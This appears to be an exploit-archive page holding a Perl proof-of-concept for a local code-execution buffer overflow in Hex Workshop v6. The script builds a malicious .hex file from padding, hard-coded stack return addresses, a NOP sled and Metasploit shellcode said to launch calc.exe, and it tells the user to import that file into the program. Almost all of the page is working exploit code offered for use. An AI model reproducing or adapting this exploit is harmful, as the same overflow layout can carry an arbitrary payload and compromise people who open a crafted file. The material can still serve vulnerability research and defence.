Hex Workshop <= v6 (.hex) File Local Code



#!/usr/bin/perl -w
# Hex Workshop <= v6 (.hex) File Local Code Execution
# Discovred by : Security^Ghost
# Exploited by : DATA_SNIPER
# Exploit Tested on WindoZ XP SP2 FR.
# for more information vist my blog:http://datasniper.arab4services.net/
# the exploit it's so weird ;),take look at the shellcode,and remember it's not AlphaNum.

print "==========================================================================\n";
print "Hex Workshop v6 (.HEX File) Local Code Execution\n";
print "Exploited by DATA_SNIPER\n";
print "Greetz to: arab4services team and AT4RE Team\n";
print "for more: http://datasniper.arab4services.net/\n";;
print "===================================================================== \n";
$junk=":0000FC\x0D\x0A:";
$shelladd="B8EE1300D0EE1300C8EE1300AAAAAAAAC8EE1300C8EE1300";#shell address in the stack and some address junk for make the exploit work as well.
#some times the stack address change to "0012xxxx" so you can use this instead
# $shelladdrr="B8EE1200D0EE1200C8EE1200AAAAAAAAC8EE1200C8EE1200"
$nop="909090909090909090909090909090";# strange noop xD
#shellcode from metasploit,execute calc.exe
#shellcode copied as it's and when the data being treated will be converted to HEX format.
$shellcode="33c9b11ebbf01a028cdaccd97424f45a83c204315a0b035afbf8f77013b8f788e3cabdb468b038bd6fa6c87277b390ac86286726bc2579d68df9e38a693967d4b07085dbf06e62e0a0548f62ad1ed0a82cca893b2247dd6326560a104ad3cdccfbbfe9163860c3e0dec9478658c60cd868ad63c5dd3aebfd94c56f3dcc6518c0c864ab547096c6abd79830d0b60adc17";
$buff='A' x 248;
$sploit =$junk.$buff.$shelladd.$nop.$shellcode;
$fle = "Xploit.hex" ;
open($data, ">>$fle") or die "Cannot open $data";
print $data $sploit;
close($data);
print "$fle has been created\n";
print "open it in HexWorkshop file->import.\n";



Relevant Pages

  • Re: Service Pack 2 is messing up my computer...
    ... Can you remember what the hex number was, ... Windows, you can uninstall SP2 via Add/Remove Programs. ...
    (microsoft.public.windowsxp.general)
  • Re: Program to parse HEX into data words
    ... to binary and place it on the stack. ... for a 64-bit bus it would be ... so for example say you had the HEX number... ...
    (comp.sys.hp48)
  • Re: Binary Trees addNode routines
    ... It states my stack is ... |0x4096 Hex. ... 4096 is the decimal equivalent for 4K. ... As a man who holds a Communications education, ...
    (comp.lang.asm.x86)
  • Re: ->STR function on 49g+
    ... I assume you want an easier way to enter hex numbers. ... > I want to convert a sequence of characters to a string. ... > Then I get on the stack: ...
    (comp.sys.hp48)
  • Re: value of uninitialized variables
    ... program in debug mode and 2018779649 in release mode. ... As for the release mode value, remember that your variable is on the stack. ... The value you are seeing, 2018779649, happens to be 0x78542201 in hex. ... system DLLs. ...
    (microsoft.public.vc.language)